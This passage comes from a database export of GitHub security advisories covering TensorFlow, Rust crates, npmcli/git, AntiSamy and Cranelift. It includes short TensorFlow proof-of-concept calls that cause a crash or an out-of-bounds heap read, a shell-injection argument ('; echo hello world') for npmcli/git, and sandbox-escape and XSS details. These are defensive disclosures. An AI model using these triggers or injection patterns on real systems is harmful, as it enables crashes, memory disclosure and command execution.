'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m7fm-4jfh-jrg6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37652'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5ecec9c6fbdbc6be03295685190a45e7eee726ab'}]","{'cwe_ids': ['CWE-415', 'CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T12:39:49Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-36xw-hgfv-jwm7,2023-06-13T16:51:41Z,2021-08-25T20:48:36Z,,['CVE-2020-35888'],"Multiple security issues including data race, buffer overflow, and uninitialized memory drop in arr","arr crate contains multiple security issues. Specifically, + +1. It incorrectly implements Sync/Send bounds, which allows to smuggle non-Sync/Send types across the thread boundary. +2. Index and IndexMut implementation does not check the array bound. +3. Array::new_from_template() drops uninitialized memory. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'arr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35888'}, {'type': 'WEB', 'url': 'https://github.com/sjep/array/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/sjep/array'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0034.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:06:43Z', 'nvd_published_at': None}" +1.4.0,GHSA-f3mq-99jr-ww4r,2023-06-13T16:55:13Z,2021-08-25T20:56:16Z,,['CVE-2020-36467'],Multiple soundness issues in cgc,"Affected versions of this crate have the following issues: + +1. `Ptr` implements `Send` and `Sync` for all types, this can lead to data + races by sending non-thread safe types across threads. + +2. `Ptr::get` violates mutable alias rules by returning multiple mutable + references to the same object. + +3. `Ptr::write` uses non-atomic writes to the underlying pointer. This means + that when used across threads it can lead to data races. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cgc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36467'}, {'type': 'WEB', 'url': 'https://github.com/playXE/cgc/issues/5'}, {'type': 'PACKAGE', 'url': 'https://github.com/playXE/cgc'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/cgc/RUSTSEC-2020-0148.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0148.html'}]","{'cwe_ids': ['CWE-657'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:11:39Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-hxwm-x553-x359,2021-08-02T19:02:32Z,2021-08-05T17:07:39Z,,[],Arbitrary Command Injection due to Improper Command Sanitization,"### Summary +There exists a command injection vulnerability in `npmcli/git` versions <2.0.8 which may result in arbitrary shell command execution due to improper argument sanitization when `npmcli/git` is used to execute Git commands based on user controlled input. + +The impact of this issue is possible Arbitrary Command Injection when `npmcli/git` is run with untrusted (user controlled) Git command arguments. + +### Impact + +Arbitrary Command Injection + +### Details + +`npmcli/git` prior to release `2.0.8` passed user controlled input as arguments to a shell command without properly sanitizing this input. Passing unsanitized input to a shell can lead to arbitrary command injection. For example passing `git+https://github.com/npm/git; echo hello world` would trigger the shell execution of `echo hello world`. + +This issue was remediated by no longer running `npmcli/git` git commands through an intermediate shell. + +### Patches + +This issue has been patched in release `2.0.8` + +### Acknowledgements + +This report was reported to us by @tyage (Ierae Security) through the [GitHub Bug Bounty Program](https://bounty.github.com). +",[],"[{'package': {'ecosystem': 'npm', 'name': '@npmcli/git'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/git/security/advisories/GHSA-hxwm-x553-x359'}, {'type': 'WEB', 'url': 'https://github.com/npm/git/pull/29'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T19:02:32Z', 'nvd_published_at': None}" +1.4.0,GHSA-9c8w-jrw3-q2c3,2022-02-08T21:02:36Z,2021-08-02T16:58:43Z,,['CVE-2021-35043'],Cross-site Scripting in OWASP AntiSamy,OWASP AntiSamy before 1.6.4 allows XSS via HTML attributes when using the HTML output serializer (XHTML is not affected). This was demonstrated by a javascript: URL with : as the replacement for the : character.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.owasp.antisamy:antisamy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35043'}, {'type': 'WEB', 'url': 'https://github.com/nahsra/antisamy/pull/87'}, {'type': 'PACKAGE', 'url': 'https://github.com/nahsra/antisamy'}, {'type': 'WEB', 'url': 'https://github.com/nahsra/antisamy/releases/tag/v1.6.4'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T21:38:51Z', 'nvd_published_at': '2021-07-19T15:15:00Z'}" +1.4.0,GHSA-95xm-g58g-3p88,2021-08-23T18:28:24Z,2021-08-25T14:44:02Z,,['CVE-2021-37640'],Integer division by 0 in sparse reshaping,"### Impact +The implementation of `tf.raw_ops.SparseReshape` can be made to trigger an integral division by 0 exception: + +```python +import tensorflow as tf + +tf.raw_ops.SparseReshape( + input_indices = np.ones((1,3)), + input_shape = np.array([1,1,0]), + new_shape = np.array([1,0])) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/reshape_util.cc#L176-L181) calls the reshaping functor whenever there is at least an index in the input but does not check that shape of the input or the target shape have both a non-zero number of elements. + +The [reshape functor](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/reshape_util.cc#L40-L78) blindly divides by the dimensions of the target shape. Hence, if this is not checked, code will result in a division by 0. + +### Patches +We have patched the issue in GitHub commit [4923de56ec94fff7770df259ab7f2288a74feb41](https://github.com/tensorflow/tensorflow/commit/4923de56ec94fff7770df259ab7f2288a74feb41). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1 as this is the other affected version. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-95xm-g58g-3p88'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37640'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4923de56ec94fff7770df259ab7f2288a74feb41'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:28:24Z', 'nvd_published_at': '2021-08-12T18:15:00Z'}" +1.4.0,GHSA-m7w4-8wp8-m2xq,2021-08-24T18:35:48Z,2021-08-25T20:59:08Z,,['CVE-2020-36442'],Data races in beef,"An issue was discovered in the beef crate before 0.5.0 for Rust. +Affected versions of this crate did not have a `T: Sync` bound in the `Send` impl for `Cow<'_, T, U>`. This allows users to create data races by making `Cow` contain types that are (Send && !Sync) like `Cell<_>` or `RefCell<_>`. + +Such data races can lead to memory corruption. + +The flaw was corrected in commit d1c7658 by adding trait bounds `T: Sync` and `T::Owned: Send` to the `Send` impl for `Cow<'_, T, U>`. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'beef'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36442'}, {'type': 'WEB', 'url': 'https://github.com/maciejhirsz/beef/issues/37'}, {'type': 'PACKAGE', 'url': 'https://github.com/maciejhirsz/beef'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/beef/RUSTSEC-2020-0122.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0122.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:50:28Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-2r8p-fg3c-wcj4,2021-08-24T12:46:02Z,2021-08-25T14:43:01Z,,['CVE-2021-37654'],Heap OOB and CHECK fail in `ResourceGather`,"### Impact +An attacker can trigger a crash via a `CHECK`-fail in debug builds of TensorFlow using `tf.raw_ops.ResourceGather` or a read from outside the bounds of heap allocated data in the same API in a release build: + +```python +import tensorflow as tf + +tensor = tf.constant(value=[[1,2],[3,4],[5,6]],shape=(3,2),dtype=tf.uint32) +v = tf.Variable(tensor) +tf.raw_ops.ResourceGather( + resource=v.handle, + indices=[0], + dtype=tf.uint32, + batch_dims=10, + validate_indices=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L660-L668) does not check that the `batch_dims` value that the user supplies is less than the rank of the input tensor. + +Since the implementation uses several for loops over the dimensions of `tensor`, this results in reading data from outside the bounds of heap allocated buffer backing the tensor: + +```cc + // batch_dims_ = > params.dims() (10 > 2) + for (int i = 0; i < batch_dims_; ++i) { + result_shape.AddDim(params.dim_size(i)); + } + for (int i = batch_dims_; i < indices.dims(); ++i) { + result_shape.AddDim(indices.dim_size(i)); + } + for (int i = batch_dims_ + 1; i < params.dims(); ++i) { + result_shape.AddDim(params.dim_size(i)); + } +``` + +In debug mode, `.dim_size(i)` validates that the argument is less than `.dims()` using a `DCHECK`. But the `DCHECK` is a no-op in release builds. + +### Patches +We have patched the issue in GitHub commit [bc9c546ce7015c57c2f15c168b3d9201de679a1d](https://github.com/tensorflow/tensorflow/commit/bc9c546ce7015c57c2f15c168b3d9201de679a1d). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2r8p-fg3c-wcj4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37654'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/bc9c546ce7015c57c2f15c168b3d9201de679a1d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T12:46:02Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-hpqh-2wqx-7qp5,2023-01-25T18:03:21Z,2021-08-25T21:01:55Z,,['CVE-2021-32629'],Memory access due to code generation flaw in Cranelift module,"There is a bug in 0.73.0 of the Cranelift x64 backend that can create a scenario that could result in a potential sandbox escape in a WebAssembly module. Users of versions 0.73.0 of Cranelift should upgrade to either 0.73.1 or 0.74 to remediate this vulnerability. Users of Cranelift prior to 0.73.0 should update to 0.73.1 or 0.74 if they were not using the old default backend. + +### Description + +This bug was introduced in the new backend on 2020-09-08 and first included in a release on 2020-09-30, but the new backend was not the default prior to 0.73.0. The recently-released version 0.73.0 with default settings, and prior versions with an explicit build flag to select the new backend, are vulnerable. The bug in question performs a sign-extend instead of a zero-extend on a value loaded from the stack, under a specific set of circumstances. If those circumstances occur, the bug could allow access to memory addresses up to 2GiB before the start of the heap allocated for the WebAssembly module. + +If the heap bound is larger than 2GiB, then it would be possible to read memory from a computable range dependent on the size of the heap's bound. + +The impact of this bug is highly dependent on heap implementation; specifically: +* if the heap has bounds checks, and +* does not rely exclusively on guard pages, and +* the heap bound is 2GiB or smaller + +then this bug cannot be used to reach memory from another WebAssembly module heap. + +The impact of the vulnerability is mitigated if there is no memory mapped in the range accessible using this bug, for example, if there is a 2 GiB guard region before the WebAssembly module heap. + +The bug in question performs a sign-extend instead of a zero-extend on a value loaded from the stack when the register allocator reloads a spilled integer value narrower than 64 bits. This interacts poorly with another optimization: the instruction selector elides a 32-to-64-bit zero-extend operator when we know that an instruction producing a 32-bit value actually zeros the upper 32 bits of its destination register. Hence, we rely on these zeroed bits, but the type of the value is still i32, and the spill/reload reconstitutes those bits as the sign extension of the i32’s MSB. + +The issue would thus occur when: +* An i32 value is greater than or equal to 0x8000_0000; +* The value is spilled and reloaded by the register allocator due to high register pressure in the program between the value’s definition and its use; +* The value is produced by an instruction that we know to be ""special"" in that it zeroes the upper 32 bits of its destination: add, sub, mul, and, or; +* The value is then zero-extended to 64 bits; +* The resulting 64-bit value is used. + +Under these circumstances there is a potential sandbox escape when the i32 value is a pointer. The usual code emitted for heap accesses zero-extends the WebAssembly heap address, adds it to a 64-bit heap base, and accesses the resulting address. If the zero-extend becomes a sign-extend, the module could reach backward and access memory up to 2GiB before the start of its heap. + +This bug was identified by developers at Fastly following a report from Javier Cabrera Arteaga, KTH Royal Institute of Technology, with support from project Trustful of Stiftelsen för Strategisk Forskning. In addition to supporting the analysis and remediation of this vulnerability, Fastly will publish a related Fastly Security Advisory at [https://www.fastly.com/security-advisories](https://www.fastly.com/security-advisories). + +In addition to assessing the nature of the code generation bug in Cranelift, we have also determined that under specific circumstances, both Lucet and Wasmtime using this version of Cranelift may be exploitable. + +### General Impact to Lucet + +Lucet inherits the heap address computation and bounds-checks of Cranelift, which it uses as its backend code generator. Of particular importance specifically is the address-space layout used by Lucet. In the default configuration for Lucet, only a single module is running, and therefore it is not possible to access memory from another module. + +By default, the open source implementation of Lucet uses a maximum heap size of 4 GiB, and an instance slot size of 8 GiB, when invoking an instance from the lucet-wasi command-line tool. These settings are within the range of vulnerability described above, but only a single instance is running, so there is no other instance to read. When embedding the runtime (for example, in a long-running daemon), the default for the heap size as described in the source is 1MB; with this setting, the runtime is not vulnerable. + +Lucet allocates its WebAssembly module instances into ""instance slots"", which are contiguous zones of virtual address space that contain the VM context at the bottom, the WebAssembly heap in the next page after that, a guard region in the middle, and other data at the top: the stack and the globals. + +If the instance slot size is less than (max heap) + 2GiB, then the lowest accessible address using the bug will overlap with the prior instance’s heap. If the size of VM context + stack + globals is greater than (4GiB - heap limit), then the highest accessible address using the bug will overlap with this critical data. If neither of these conditions are true, the bug should only result in an access to the prior instance’s guard region. + +Generally, if the limit is between 2GiB and 4GiB - ~1MB (depending on stack/global size) and the instance slot size is less than 6GiB, the configuration is vulnerable. If the limit is greater than 4GiB - ~1MB, the configuration is vulnerable regardless of instance slot size. Otherwise, the configuration is not vulnerable. + +### General Impact on Wasmtime + +In Wasmtime, the same Cranelift heap address computations and heap types are used as above. The memory layout, however, is slightly different, with different outcomes: +* With the mmap implementation impact is mitigated probabilistically if ASLR is enabled. +* With the pooling allocator, the vulnerability only exists if a memory reservation size lower than the default of 6GB is used. + +With the default mmap-based instance memory implementation, Wasmtime uses mmap() to allocate a block of memory large enough for the heap and guard region, as specified in its configuration. If the underlying OS implements ASLR (modern Linux, macOS and Windows do) then this address will be randomized, and the region below it will (probabilistically) be free. Hence, the bug is mitigated probabilistically in the default configuration if ASLR is enabled. + +If using the pooling allocator, the vulnerability exists if instance memory size (`memory_reservation_size` in InstanceLimit) is strictly less than 6GiB (4 GiB + 2 GiB of guard pages). The default is 6GiB, so the vulnerability is masked in the default pooling allocator configuration. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cranelift-codegen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.73.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-hpqh-2wqx-7qp5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32629'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/commit/95559c01aaa7c061088a433040f31e8291fb09d0'}, {'type': 'WEB', 'url': 'https://crates.io/crates/cranelift-codegen'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/blob/main/crates/cranelift-codegen/RUSTSEC-2021-0067.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/bytecodealliance/wasmtime/tree/main/cranelift'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0067.html'}, {'type': 'WEB', 'url': 'https://www.fastly.com/security-advisories/memory-access-due-to-code-generation-flaw-in-cranelift-module'}]","{'cwe_ids': ['CWE-125', 'CWE-788'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:51:32Z', 'nvd_published_at': '2021-05-24T16:15:00Z'}" +1.4.0,GHSA-p9gf-gmfv-398m,2023-03-30T23:01:08Z,2021-08-25T20:54:16Z,,['CVE-2021-29938'],Double free in slice-deque,An issue was discovered in the slice-deque crate through 2021-02-19 for Rust. A double drop can occur in SliceDeque::drain_filter upon a panic in a predicate function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'slice-deque'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29938'}, {'type': 'WEB', 'url': 'https://github.com/gnzlbg/slice_deque/issues/90'}, {'type': 'PACKAGE', 'url': 'https://github.com/gnzlbg/slice_deque'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0047.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:14:58Z', 'nvd_published_at': None}" +1.4.0,GHSA-4vhw-4rw7-jfpv,2023-02-09T14:23:48Z,2021-08-25T20:49:02Z,,['CVE-2020-35883'],Path traversal in mozwire,An issue was discovered in the mozwire crate through 2020-08-18 for Rust. A ../ directory-traversal situation allows overwriting local files that have .conf at the end of the filename.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'mozwire'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35883'}, {'type': 'WEB', 'url': 'https://github.com/NilsIrl/MozWire/issues/14'}, {'type': 'WEB', 'url': 'https://github.com/NilsIrl/MozWire/pull/17/commits/dd0639bf2876773b66382f47285f7db701f628d9'}, {'type': 'PACKAGE', 'url': 'https://github.com/NilsIrl/MozWire/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0030.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:56:07Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-29v7-3v4c-gf38,2023-06-13T20:11:11Z,2021-08-25T20:57:24Z,,['CVE-2020-36454'],Data races in parc,"In the affected versions of this crate, LockWeak unconditionally implemented Send with no trait bounds on T. LockWeak doesn't own T and only provides &T. This allows concurrent access to a non-Sync T, which can cause undefined behavior like data races.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'parc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36454'}, {'type': 'WEB', 'url': 'https://github.com/hyyking/rustracts/pull/6'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyyking/rustracts/tree/master/parc'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/parc/RUSTSEC-2020-0134.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0134.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:23:35Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-wv4p-jp67-jr97,2023-06-13T18:44:57Z,2021-08-25T20:50:05Z,,['CVE-2020-35925'],Data races in magnetic,"Affected versions of this crate unconditionally implemented Sync and Send traits for MPMCConsumer and MPMCProducer types. This allows users to send types that do not implement Send trait across thread boundaries, which can cause a data race. The flaw was corrected in the 2.0.1 release by adding T: Send bound to affected Sync/Send trait implementations.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'magnetic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35925'}, {'type': 'WEB', 'url': 'https://github.com/johnshaw/magnetic/issues/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/johnshaw/magnetic'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0088.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:56:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-f8pv-x7h8-687v,2021-09-02T18:50:42Z,2021-08-30T16:22:25Z,,['CVE-2020-19709'],Cross-site scripting in feehicms,Insufficient filtering of the tag parameters in feehicms 0.1.3 allows attackers to execute arbitrary web or HTML via a crafted payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'feehi/feehicms'}, 'ranges': 